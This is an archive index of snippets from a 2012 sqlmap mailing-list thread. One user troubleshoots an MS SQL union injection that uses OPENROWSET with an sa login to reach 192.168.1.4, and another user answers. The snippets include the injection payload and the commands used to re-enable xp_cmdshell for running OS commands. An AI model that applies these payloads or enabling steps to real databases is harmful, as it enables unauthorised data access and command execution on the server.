Re: [sqlmap-users] error with ms sql

2012-06-21 Thread Miroslav Stampar
lect @@version. > > now question is how do i embed a string inside another string delimited > with quotes? Looks like double quotes is not working.doubling quote '' > looks like not working always > > -- > *From:* Adi Mutu > *To

Re: [sqlmap-users] error with ms sql

2012-06-21 Thread Adi Mutu
@@version;  master..sp_configure ''xp_cmdshell'',1 Any possibility to give the string from ascii codes as in mysql?  From: Miroslav Stampar To: Adi Mutu Cc: "sqlmap-users@lists.sourceforge.net" Sent: Thursday, June 21, 201

Re: [sqlmap-users] error with ms sql

2012-06-21 Thread Miroslav Stampar
r: > > OLE DB error trace [Non-interface error: OLE DB provider unable to process > object, since the object has no columnsProviderName='SQLOLEDB', Query=exec > sp_addextendedproc "xp_cmdshell","xp_log70.dll" ']. > > > ------

Re: [sqlmap-users] error with ms sql

2012-06-21 Thread Adi Mutu
Thursday, June 21, 2012 11:45 AM Subject: Re: [sqlmap-users] error with ms sql tried, same stuff. I've tried to reenable xp_cmdshell first with master..sp_configure 'show advanced options',1  reconfigure  master..sp_configure 'xp_cmdshell',1  reconfigure  and got the

Re: [sqlmap-users] error with ms sql

2012-06-21 Thread Adi Mutu
#x27;, Query=exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" ']. From: Miroslav Stampar To: Adi Mutu Cc: "sqlmap-users@lists.sourceforge.net" Sent: Thursday, June 21, 2012 11:26 AM Subject: Re: [sqlmap-users] error with ms sql try with master..

Re: [sqlmap-users] error with ms sql

2012-06-21 Thread Miroslav Stampar
the same > error. > > Kind Regards, > A. > > -- > *From:* Miroslav Stampar > *To:* Adi Mutu > *Cc:* "sqlmap-users@lists.sourceforge.net" < > sqlmap-users@lists.sourceforge.net> > *Sent:* Thursday, June 21, 2012 11:11 AM &g

Re: [sqlmap-users] error with ms sql

2012-06-21 Thread Adi Mutu
lmap-users] error with ms sql Hi Adi. You could try prepending the database name to the resultbcd. It seems that in case of linked server(s) doing that fixes the mentioned problem (Reference: http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=133

Re: [sqlmap-users] error with ms sql

2012-06-21 Thread Miroslav Stampar
p.s. find the current database name and prepend to the resultbcd (e.g. 'SELECT output FROM currentdb.resultbcd') p.p.s. SELECT DB_NAME() <- should work for retrieving current db name via that OPENROWSET On Thu, Jun 21, 2012 at 10:11 AM, Miroslav Stampar < miroslav.stam...@gmail.com

Re: [sqlmap-users] error with ms sql

2012-06-21 Thread Miroslav Stampar
Hi Adi. You could try prepending the database name to the resultbcd. It seems that in case of linked server(s) doing that fixes the mentioned problem (Reference: http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466 ) Kind

[sqlmap-users] error with ms sql

2012-06-21 Thread Adi Mutu
I'm having an injection like this: openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4) -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12',  ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select output